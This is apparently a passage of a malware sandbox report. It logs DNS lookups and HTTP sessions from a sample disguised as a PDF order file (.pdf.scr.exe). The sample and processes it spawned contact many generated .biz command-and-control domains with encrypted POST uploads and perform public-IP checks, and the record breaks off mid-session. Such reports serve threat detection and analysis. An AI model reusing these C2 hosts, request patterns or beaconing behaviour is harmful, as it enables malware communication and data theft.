Nov 28, 2024 06:41:05.984324932 CET	1.1.1.1	192.168.2.4	0x4129	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 28, 2024 06:41:05.984324932 CET	1.1.1.1	192.168.2.4	0x4129	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:41:05.984324932 CET	1.1.1.1	192.168.2.4	0x4129	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:41:05.984324932 CET	1.1.1.1	192.168.2.4	0x4129	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:41:05.984324932 CET	1.1.1.1	192.168.2.4	0x4129	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:41:05.984324932 CET	1.1.1.1	192.168.2.4	0x4129	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:41:06.253618956 CET	1.1.1.1	192.168.2.4	0x1578	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:41:06.253618956 CET	1.1.1.1	192.168.2.4	0x1578	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:41:06.253618956 CET	1.1.1.1	192.168.2.4	0x1578	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:41:06.621968985 CET	1.1.1.1	192.168.2.4	0xeb5f	No error (0)	cvgrf.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:41:08.075865984 CET	1.1.1.1	192.168.2.4	0x3d40	No error (0)	reallyfreegeoip.org		172.67.177.134	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:41:08.075865984 CET	1.1.1.1	192.168.2.4	0x3d40	No error (0)	reallyfreegeoip.org		104.21.67.152	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:41:09.255354881 CET	1.1.1.1	192.168.2.4	0x883d	No error (0)	s82.gocheapweb.com		51.195.88.199	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:41:09.473756075 CET	1.1.1.1	192.168.2.4	0xdd57	No error (0)	npukfztj.biz		44.221.84.105	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:41:11.250536919 CET	1.1.1.1	192.168.2.4	0xa2b9	No error (0)	przvgke.biz		172.234.222.143	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:41:11.250536919 CET	1.1.1.1	192.168.2.4	0xa2b9	No error (0)	przvgke.biz		172.234.222.138	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:41:14.394335985 CET	1.1.1.1	192.168.2.4	0x7b75	Name error (3)	zlenh.biz	none	none	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:41:14.892731905 CET	1.1.1.1	192.168.2.4	0xa4d6	No error (0)	knjghuig.biz		18.141.10.107	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:41:15.987929106 CET	1.1.1.1	192.168.2.4	0x2c6d	No error (0)	pywolwnvd.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:41:17.428697109 CET	1.1.1.1	192.168.2.4	0xc558	Name error (3)	uhxqin.biz	none	none	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:41:17.649848938 CET	1.1.1.1	192.168.2.4	0x83e9	Name error (3)	anpmnmxo.biz	none	none	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:41:18.378688097 CET	1.1.1.1	192.168.2.4	0x388b	No error (0)	lpuegx.biz		82.112.184.197	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:41:18.799073935 CET	1.1.1.1	192.168.2.4	0xfb2c	No error (0)	pywolwnvd.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:42:03.935302019 CET	1.1.1.1	192.168.2.4	0x8fec	No error (0)	vjaxhpbji.biz		82.112.184.197	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:42:49.852696896 CET	1.1.1.1	192.168.2.4	0xeb7b	No error (0)	xlfhhhm.biz		47.129.31.212	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:42:52.467926979 CET	1.1.1.1	192.168.2.4	0xb22e	No error (0)	ifsaia.biz		13.251.16.150	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:42:55.223339081 CET	1.1.1.1	192.168.2.4	0xad48	No error (0)	saytjshyf.biz		44.221.84.105	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:42:57.167975903 CET	1.1.1.1	192.168.2.4	0x788f	No error (0)	vcddkls.biz		18.141.10.107	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:42:59.699141026 CET	1.1.1.1	192.168.2.4	0x7814	No error (0)	fwiwk.biz		172.234.222.143	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:42:59.699141026 CET	1.1.1.1	192.168.2.4	0x7814	No error (0)	fwiwk.biz		172.234.222.138	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:43:02.889674902 CET	1.1.1.1	192.168.2.4	0xe2ef	No error (0)	tbjrpv.biz		34.246.200.160	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:43:05.304985046 CET	1.1.1.1	192.168.2.4	0x27a4	No error (0)	deoci.biz		18.208.156.248	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:43:07.272051096 CET	1.1.1.1	192.168.2.4	0x4602	No error (0)	gytujflc.biz		208.100.26.245	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:43:09.355329990 CET	1.1.1.1	192.168.2.4	0xc021	No error (0)	qaynky.biz		13.251.16.150	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:43:12.014588118 CET	1.1.1.1	192.168.2.4	0x9190	No error (0)	bumxkqgxu.biz		44.221.84.105	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:43:13.831267118 CET	1.1.1.1	192.168.2.4	0xe9ca	No error (0)	dwrqljrr.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:43:15.928200960 CET	1.1.1.1	192.168.2.4	0x396	No error (0)	nqwjmb.biz		35.164.78.200	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:43:17.900840044 CET	1.1.1.1	192.168.2.4	0xa5e8	No error (0)	ytctnunms.biz		3.94.10.34	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:43:19.544133902 CET	1.1.1.1	192.168.2.4	0xa867	No error (0)	myups.biz		165.160.15.20	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:43:19.544133902 CET	1.1.1.1	192.168.2.4	0xa867	No error (0)	myups.biz		165.160.13.20	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:43:22.106606007 CET	1.1.1.1	192.168.2.4	0xc126	No error (0)	oshhkdluh.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:43:24.142800093 CET	1.1.1.1	192.168.2.4	0x34c1	No error (0)	yunalwv.biz		208.100.26.245	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:43:26.446454048 CET	1.1.1.1	192.168.2.4	0x8ffc	No error (0)	jpskm.biz		18.246.231.120	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:43:28.565164089 CET	1.1.1.1	192.168.2.4	0x5648	No error (0)	lrxdmhrr.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:43:30.542460918 CET	1.1.1.1	192.168.2.4	0x344c	No error (0)	wllvnzb.biz		18.141.10.107	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:43:50.698504925 CET	1.1.1.1	192.168.2.4	0x5fd6	No error (0)	gnqgo.biz		18.208.156.248	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:43:52.417704105 CET	1.1.1.1	192.168.2.4	0xd050	No error (0)	jhvzpcfg.biz		44.221.84.105	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:43:54.162873030 CET	1.1.1.1	192.168.2.4	0x7f83	No error (0)	acwjcqqv.biz		18.141.10.107	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:43:57.252832890 CET	1.1.1.1	192.168.2.4	0xc51d	No error (0)	vyome.biz		18.246.231.120	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:43:59.289573908 CET	1.1.1.1	192.168.2.4	0x4ffe	No error (0)	yauexmxk.biz		18.208.156.248	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:01.048329115 CET	1.1.1.1	192.168.2.4	0xafb2	No error (0)	iuzpxe.biz		13.251.16.150	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:04.031538963 CET	1.1.1.1	192.168.2.4	0x3fbb	No error (0)	sxmiywsfv.biz		13.251.16.150	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:07.606899977 CET	1.1.1.1	192.168.2.4	0x5f0c	No error (0)	vrrazpdh.biz		18.246.231.120	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:09.729979992 CET	1.1.1.1	192.168.2.4	0xdda3	No error (0)	ftxlah.biz		47.129.31.212	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:12.406516075 CET	1.1.1.1	192.168.2.4	0x45ec	No error (0)	typgfhb.biz		13.251.16.150	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:15.081072092 CET	1.1.1.1	192.168.2.4	0x1d9e	No error (0)	esuzf.biz		18.246.231.120	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:17.136461020 CET	1.1.1.1	192.168.2.4	0xe0f8	No error (0)	gvijgjwkh.biz		3.94.10.34	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:18.946954012 CET	1.1.1.1	192.168.2.4	0x3bb7	No error (0)	qpnczch.biz		18.246.231.120	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:21.097068071 CET	1.1.1.1	192.168.2.4	0x545f	No error (0)	brsua.biz		3.254.94.185	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:22.878952980 CET	1.1.1.1	192.168.2.4	0xec1b	No error (0)	dlynankz.biz		85.214.228.140	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:25.292131901 CET	1.1.1.1	192.168.2.4	0xd99c	No error (0)	oflybfv.biz		47.129.31.212	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:27.981496096 CET	1.1.1.1	192.168.2.4	0x9837	No error (0)	yhqqc.biz		18.246.231.120	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:30.099250078 CET	1.1.1.1	192.168.2.4	0xbf1	No error (0)	mnjmhp.biz		47.129.31.212	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:32.761079073 CET	1.1.1.1	192.168.2.4	0xf001	No error (0)	opowhhece.biz		18.208.156.248	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:35.020282984 CET	1.1.1.1	192.168.2.4	0xef9c	No error (0)	jdhhbs.biz		13.251.16.150	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:37.763474941 CET	1.1.1.1	192.168.2.4	0xd4d1	No error (0)	mgmsclkyu.biz		34.246.200.160	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:39.800936937 CET	1.1.1.1	192.168.2.4	0x46aa	No error (0)	warkcdu.biz		18.141.10.107	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:42.517395020 CET	1.1.1.1	192.168.2.4	0xadb0	No error (0)	gcedd.biz		13.251.16.150	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:45.183821917 CET	1.1.1.1	192.168.2.4	0x6708	No error (0)	jwkoeoqns.biz		18.208.156.248	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:46.934849977 CET	1.1.1.1	192.168.2.4	0xfc5e	No error (0)	xccjj.biz		18.246.231.120	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:48.937120914 CET	1.1.1.1	192.168.2.4	0xbae	No error (0)	hehckyov.biz		44.221.84.105	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:50.736228943 CET	1.1.1.1	192.168.2.4	0xf309	No error (0)	rynmcq.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:52.744383097 CET	1.1.1.1	192.168.2.4	0xf65b	No error (0)	uaafd.biz		3.254.94.185	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:54.790857077 CET	1.1.1.1	192.168.2.4	0x99c4	No error (0)	eufxebus.biz		18.141.10.107	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:44:58.639028072 CET	1.1.1.1	192.168.2.4	0x6a7f	No error (0)	pwlqfu.biz		34.246.200.160	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:45:00.922355890 CET	1.1.1.1	192.168.2.4	0x31c7	No error (0)	rrqafepng.biz		47.129.31.212	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:45:01.032640934 CET	1.1.1.1	192.168.2.4	0x31c7	No error (0)	rrqafepng.biz		47.129.31.212	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:45:03.677004099 CET	1.1.1.1	192.168.2.4	0xb614	No error (0)	ctdtgwag.biz		3.94.10.34	A (IP address)	IN (0x0001)	false
Nov 28, 2024 06:45:05.466051102 CET	1.1.1.1	192.168.2.4	0x7995	No error (0)	tnevuluw.biz		35.164.78.200	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

reallyfreegeoip.org

pywolwnvd.biz

ssbzmoy.biz

checkip.dyndns.org

cvgrf.biz

npukfztj.biz

przvgke.biz

knjghuig.biz

lpuegx.biz

vjaxhpbji.biz

xlfhhhm.biz

ifsaia.biz

saytjshyf.biz

vcddkls.biz

fwiwk.biz

tbjrpv.biz

deoci.biz

gytujflc.biz

qaynky.biz

bumxkqgxu.biz

dwrqljrr.biz

nqwjmb.biz

ytctnunms.biz

myups.biz

oshhkdluh.biz

yunalwv.biz

jpskm.biz

lrxdmhrr.biz

wllvnzb.biz

gnqgo.biz

jhvzpcfg.biz

acwjcqqv.biz

vyome.biz

yauexmxk.biz

iuzpxe.biz

sxmiywsfv.biz

vrrazpdh.biz

ftxlah.biz

typgfhb.biz

esuzf.biz

gvijgjwkh.biz

qpnczch.biz

brsua.biz

dlynankz.biz

oflybfv.biz

yhqqc.biz

mnjmhp.biz

opowhhece.biz

jdhhbs.biz

mgmsclkyu.biz

warkcdu.biz

gcedd.biz

jwkoeoqns.biz

xccjj.biz

hehckyov.biz

rynmcq.biz

uaafd.biz

eufxebus.biz

pwlqfu.biz

rrqafepng.biz

ctdtgwag.biz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	54.244.188.177	80	7272	C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:41:01.707511902 CET	356	OUT	POST /tbqsdcfeojy HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: pywolwnvd.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 856
Nov 28, 2024 06:41:01.707532883 CET	856	OUT	Data Raw: 00 a2 01 40 da ba 04 97 4c 03 00 00 28 d0 b7 00 fa a5 a5 b8 24 94 45 8b 45 6c 10 b2 1c 94 03 d4 50 e6 b9 0d 14 9e fc 7e a0 68 05 50 17 f7 49 ce 6f ff b6 50 40 0a 50 93 29 5d ca 9e d1 bd 14 b5 ea c7 8d 84 62 3f 8c 05 50 a3 9e 09 e6 a6 ae 9f 92 4e Data Ascii: @L($EElP~hPIoP@P)]b?PN`Hx/;x+7zi"5?UM1!nN^V@C"5^R0vIY[DddO_A{ujpFUMiezLD&0T},L6.<.T-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	54.244.188.177	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:41:01.711091042 CET	350	OUT	POST /hofte HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: pywolwnvd.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:41:01.711157084 CET	778	OUT	Data Raw: cd bf 44 15 34 12 f9 35 fe 02 00 00 cb b8 43 46 b3 1e 40 97 19 9d f4 4b 10 19 7e 82 8e da 2a c4 41 fb 46 a7 61 fd 75 e9 4e 6a 36 3c a1 c5 f3 cd e5 2a 2f dc 6d c4 c4 b6 d5 2d 24 e4 61 8a 53 92 af 27 1b 9a 44 92 99 54 4b d0 50 51 c5 4f 15 27 da 36 Data Ascii: D45CF@K~AFauNj6</m-$aS'DTKPQO'6j+YsM-D3za%a'Hh-3ODl}fFyjzONQ~grrAjoF?~uuSADT/Thsub$:d5N@Y;[]Mb
Nov 28, 2024 06:41:03.093574047 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:41:02 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=754a2fff63e3cb0018624ce3d1d9e4d5\|8.46.123.228\|1732772462\|1732772462\|0\|1\|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	54.244.188.177	80	7444	C:\Users\user\AppData\Local\bothsided\surmit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:41:03.245058060 CET	356	OUT	POST /hfbsoyybcej HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: pywolwnvd.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 828
Nov 28, 2024 06:41:03.245058060 CET	828	OUT	Data Raw: ee 99 23 da e3 ad 50 4d 30 03 00 00 5a 18 e3 49 83 99 e1 f7 4d fd 2b b5 ba 7c 6a 8e f8 91 5d c9 14 e9 9e 38 1a 9a ba bc 16 d9 80 a3 6c 45 82 c2 46 a0 db 57 85 e0 37 1e a5 16 48 5f 99 60 93 cc 7d ea 6c 35 77 f3 70 2b 31 c6 30 bb 58 d0 65 25 16 ac Data Ascii: #PM0ZIM+\|j]8lEFW7H_`}l5wp+10Xe%[HO&*L (8?r5pB NI')oL\|l`&dm$,5;L-TTp{"x'id#ZF\|2b"gJxvC{[R/(.<"-
Nov 28, 2024 06:41:04.658366919 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:41:04 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=dc8e1bbca3fc383bd42610479d1eb128\|8.46.123.228\|1732772464\|1732772464\|0\|1\|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	18.141.10.107	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:41:03.789482117 CET	349	OUT	POST /qwhxdc HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ssbzmoy.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:41:03.789829969 CET	778	OUT	Data Raw: 99 e3 73 2c b2 3a c6 6a fe 02 00 00 88 aa 06 d4 9d ba a6 9d ad ce da 0d bf 04 23 49 1f c3 a1 51 7c 11 65 52 28 38 1d 45 e2 be 8c f8 b7 37 e4 20 cb c5 e4 a5 3a 92 9c a0 1d 65 63 47 ab 06 f6 2f f1 12 7f 54 00 3c 65 39 db 70 8d e5 ac 2a 06 7c e4 33 Data Ascii: s,:j#IQ\|eR(8E7 :ecG/T<e9p*\|3;-&E5?[){Y`&^YpJ-hxsXaMzTLT"nI8`E<@?6OR}h&en&Z[X./E"?g{eD;>1Z
Nov 28, 2024 06:41:05.907382011 CET	411	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:41:05 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=d8166adbb458068a2ada011a71323fa7\|8.46.123.228\|1732772465\|1732772465\|0\|1\|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49734	158.101.44.242	80	7664	C:\Users\user\AppData\Local\Temp\server02.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:41:06.115438938 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 28, 2024 06:41:07.326824903 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 28 Nov 2024 05:41:07 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b34603d1d0dfd65a091adb92f48a54fe Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>
Nov 28, 2024 06:41:07.332174063 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 28, 2024 06:41:07.710310936 CET	321	IN	HTTP/1.1 200 OK Date: Thu, 28 Nov 2024 05:41:07 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 47909130df2192a873d8757987d1bd99 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49736	54.244.188.177	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:41:06.775475979 CET	343	OUT	POST /hn HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: cvgrf.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:41:06.775475979 CET	778	OUT	Data Raw: f5 67 10 0b 64 e6 69 b8 fe 02 00 00 77 64 a1 06 9f 1d d2 ae e3 04 a5 fa c0 72 7c ba 30 c9 e1 35 17 0e 95 2d 97 28 3c 9c 31 71 aa c6 9f db bd 58 18 43 1c a4 6c ee bc 7f 23 01 ba 3c 3b 5b dd 30 55 c2 fd 19 b2 20 ce 82 0a 11 37 ce 19 fd f5 f7 2f de Data Ascii: gdiwdr\|05-(<1qXCl#<;[0U 7/n:,;LA6ESUB(BT3fx=swv173e}&Lf3JWMo7q`oba6V$@3`O*+[;~8p_;)U#AZTPQ]p}'W
Nov 28, 2024 06:41:08.936341047 CET	409	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:41:07 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=74251e7477e04848fdc3a3e1866e2186\|8.46.123.228\|1732772467\|1732772467\|0\|1\|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49739	44.221.84.105	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:41:09.727304935 CET	354	OUT	POST /cvmmqsiwgd HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: npukfztj.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:41:09.727328062 CET	778	OUT	Data Raw: b8 94 ed 0b 65 a7 9e 74 fe 02 00 00 8f c6 dc ff c0 d1 0a 3c 36 1a c9 43 93 fd 32 2a 5e 80 2f 24 f7 3f b4 4b 23 76 47 0f d4 f0 13 31 99 d6 14 29 7c f1 6c 93 10 bc aa 42 fa eb 99 d1 3b dc 61 48 1b 74 5f 12 a6 f1 13 74 73 54 1b 8e 7e 75 d9 ef 1a f2 Data Ascii: et<6C2^/$?K#vG1)\|lB;aHt_tsT~uz~AgyOo<% UVQHZ\Z-:.v\oBY(,{:eXNzB`zAb%?7.N$@Bmqn/d;?RjL$TV-9@:/=x
Nov 28, 2024 06:41:10.932003975 CET	412	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 05:41:10 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=84290b48bd65c632b53db77655b132cb\|8.46.123.228\|1732772470\|1732772470\|0\|1\|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49740	172.234.222.143	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 06:41:11.405472040 CET	348	OUT	POST /bgeqs HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: przvgke.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Nov 28, 2024 06:41:11.405508995 CET	778	OUT	Data Raw: 88 4d 63 64 44 eb 50 86 fe 02 00 00 50 bd d7 8a 7c d2 f4 c5 aa 02 f0 11 1e b9 40 e4 4c 19 62 4f 1f dc 98 65 47 e9 c4 cc bb 35 7b b1 d4 0f 49 fd 55 f0 93 23 e0 c7 59 a1 16 64 01 aa 21 05 43 69 ab 40 38 84 39 f4 f7 72 a6 10 0c 70 ac 70 07 95 1a fc Data Ascii: McdDPP\|@LbOeG5{IU#Yd!Ci@89rppf#YQNuD1]6HedN"N)!WRY)1Co:SrbOZJxR=J(QTM##u;%/:h

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49741	172.234.222.143	80	7332	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
